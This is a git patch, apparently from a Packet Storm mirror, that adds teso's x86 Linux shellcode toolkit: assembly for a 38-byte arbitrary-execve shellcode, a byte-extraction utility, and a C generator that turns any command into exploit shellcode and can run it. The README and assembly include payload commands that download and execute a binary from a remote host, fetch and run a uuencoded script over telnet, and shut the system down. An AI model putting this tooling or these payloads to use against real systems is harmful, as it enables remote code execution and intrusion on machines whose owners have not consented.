From 5d3573ef7a109ee70416fe94db098fe6a769a798 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Tue, 3 Mar 2026 06:28:55 +0000 Subject: packetstorm sync --- other/shell/README | 38 ++++++++++++++ other/shell/sc.s | 51 +++++++++++++++++++ other/shell/shellcode.c | 46 +++++++++++++++++ other/shell/shellxp | Bin 0 -> 90748 bytes other/shell/shellxp.c | 130 ++++++++++++++++++++++++++++++++++++++++++++++++ 5 files changed, 265 insertions(+) create mode 100644 other/shell/README create mode 100644 other/shell/sc.s create mode 100644 other/shell/shellcode.c create mode 100755 other/shell/shellxp create mode 100644 other/shell/shellxp.c (limited to 'other/shell') diff --git a/other/shell/README b/other/shell/README new file mode 100644 index 0000000..b6fbeaa --- /dev/null +++ b/other/shell/README @@ -0,0 +1,38 @@ + +gcc -o shellxp shellxp.c + +./shellxp commands ... + +or to exec the generated shellcode + +./shellxp exec commands ... + + +either rip the sc_build routine into your exploits to directly create the +shellcode on the fly, or prepare it. + +some examples: + +./shellxp /bin/sh -c "lynx -source 1.1.1.1/a>a;chmod +x a;./a" +./shellxp /bin/sh -c "echo haha > /tmp/owned" +./shellxp /sbin/shutdown -h now + +or especially fancy ;-) + +./shellxp /bin/sh -c "((echo GET /test/ HTTP/1.0;echo;sleep 5)|telnet www.foo.org 80)|uudecode;/tmp/run.sh" + + (where /test/index.html is an uuencoded file that will uudecode to an executeable /tmp/run.sh file) + modify the "sleep 5" to an appropiate value to allow the file to get retrieved :-) + +(imagine some other fancy stuff in here :-) +... + +-scut/teso. + + +to modify the shellcode, use: + +gcc -o shellcode shellcode.c sc.s +./shellcode <-- will dump the code +./shellcode foo <-- will dump and run the code + diff --git a/other/shell/sc.s b/other/shell/sc.s new file mode 100644 index 0000000..6133b3e --- /dev/null +++ b/other/shell/sc.s @@ -0,0 +1,51 @@ +/* 38 byte arbitrary execve PIC linux/x86 shellcode - scut/teso */ + +.data +.globl cbegin +.globl cend + +cbegin: + + jmp jahead + +docall: + pop %edi + + movl %edi, %esp + not %sp /* build new stack frame */ + + xorl %eax, %eax /* read number of arguments */ + movb (%edi), %al + inc %edi + +decl1: push %edi +decl2: scasb /* search delim bytes */ + jnz decl2 + + movb %ah, -1(%edi) + dec %eax + jnz decl1 + + pop %ebx /* pathname */ + push %ebx + + push %eax + pop %edx /* esp -= 4, edx = &envp[] = NULL */ + movl %esp, %ecx /* ecx = &argv[] */ + + movb $11, %al + int $0x80 + +jahead: call docall + +/* reverse order arguments */ +.byte 0x03 /* number of arguments */ +.ascii "lynx -source 123.123.123.123/a>a;chmod +x a;echo ./a" +.byte 0x03 +.ascii "-c" +.byte 0x02 +.ascii "/bin/sh" +.byte 0x01 + +cend: + diff --git a/other/shell/shellcode.c b/other/shell/shellcode.c new file mode 100644 index 0000000..1fc68cf --- /dev/null +++ b/other/shell/shellcode.c @@ -0,0 +1,46 @@ +/* shellcode extraction utility, + * by type / teso, small mods by scut. + */ + + +#include +#include + +extern void cbegin (); +extern void cend (); + + +int +main (int argc, char *argv[]) +{ + int i; + unsigned char * buf = (unsigned char *) cbegin; + unsigned char ex_buf[1024]; + + + printf ("/* %d byte shellcode */\n", cend - cbegin); + printf ("\""); + for (i = 0 ; buf < (unsigned char *) cend; ++buf) { + + printf ("\\x%02x", *buf & 0xff); + + if (++i >= 12) { + i = 0; + printf ("\"\n\""); + } + } + printf ("\";\n"); + + printf("\n"); + + if (argc > 1) { + printf ("%02x\n", ((unsigned char *) cbegin)[0]); + printf ("%02x\n", ex_buf[0]); + memcpy (ex_buf, cbegin, cend - cbegin); + printf ("%02x\n", ex_buf[0]); + ((void (*)()) &ex_buf)(); + } + + exit (EXIT_SUCCESS); +} + diff --git a/other/shell/shellxp b/other/shell/shellxp new file mode 100755 index 0000000..c52acb2 Binary files /dev/null and b/other/shell/shellxp differ diff --git a/other/shell/shellxp.c b/other/shell/shellxp.c new file mode 100644 index 0000000..4d5916b --- /dev/null +++ b/other/shell/shellxp.c @@ -0,0 +1,130 @@ + +#include +#include +#include +#include +#include + + +/* 38 byte x86/linux PIC arbitrary execute shellcode - scut / teso + */ +unsigned char shellcode[] = + "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07" + "\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b" + "\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff" + "\xff\xff"; + +static int sc_build (unsigned char *target, size_t target_len, + unsigned char *shellcode, char **argv); + +void hexdump (unsigned char *cbegin, unsigned char *cend); + + +static int +sc_build (unsigned char *target, size_t target_len, unsigned char *shellcode, + char **argv) +{ + int i; + size_t tl_orig = target_len; + + + if (strlen (shellcode) >= (target_len - 1)) + return (-1); + + memcpy (target, shellcode, strlen (shellcode)); + target += strlen (shellcode); + target_len -= strlen (shellcode); + + for (i = 0 ; argv[i] != NULL ; ++i) + ; + + /* set argument count + */ + target[0] = (unsigned char) i; + target++; + target_len--; + + for ( ; i > 0 ; ) { + i -= 1; + + if (strlen (argv[i]) >= target_len) + return (-1); + + printf ("[%3d/%3d] adding (%2d): %s\n", + (tl_orig - target_len), tl_orig, + strlen (argv[i]), argv[i]); + + memcpy (target, argv[i], strlen (argv[i])); + target += strlen (argv[i]); + target_len -= strlen (argv[i]); + + target[0] = (unsigned char) (i + 1); + target++; + target_len -= 1; + } + + return (tl_orig - target_len); +} + + +void +hexdump (unsigned char *cbegin, unsigned char *cend) +{ + int i; + unsigned char * buf = cbegin; + + + printf ("/* %d byte shellcode */\n", cend - cbegin); + printf ("\""); + + for (i = 0 ; buf < cend; ++buf) { + + printf ("\\x%02x", *buf & 0xff); + + if (++i >= 12) { + i = 0; + printf ("\"\n\""); + } + } + printf ("\";\n\n"); +} + + +int +main (int argc, char *argv[]) +{ + int n; + unsigned char tbuf[2048]; + void (* tbuf_f)(void) = (void *) tbuf; + + + printf ("build exploit shellcode\n"); + printf ("-scut / teso.\n\n"); + + if (argc < 2) { + printf ("usage: %s [exec] commands ...\n\n", + argv[0]); + + exit (EXIT_FAILURE); + } + + printf ("constructing shellcode...\n\n"); + memset (tbuf, '\x00', sizeof (tbuf)); + if (strcmp (argv[1], "exec") == 0) + n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[2]); + else + n = sc_build (tbuf, sizeof (tbuf), shellcode, &argv[1]); + if (n == -1) { + printf ("failed to build it.\n"); + exit (EXIT_FAILURE); + } + + printf ("shellcode size: %d bytes\n\n", n); + hexdump (tbuf, tbuf + n); + + if (strcmp (argv[1], "exec") == 0) + tbuf_f (); + + exit (EXIT_SUCCESS); +} + -- cgit v1.3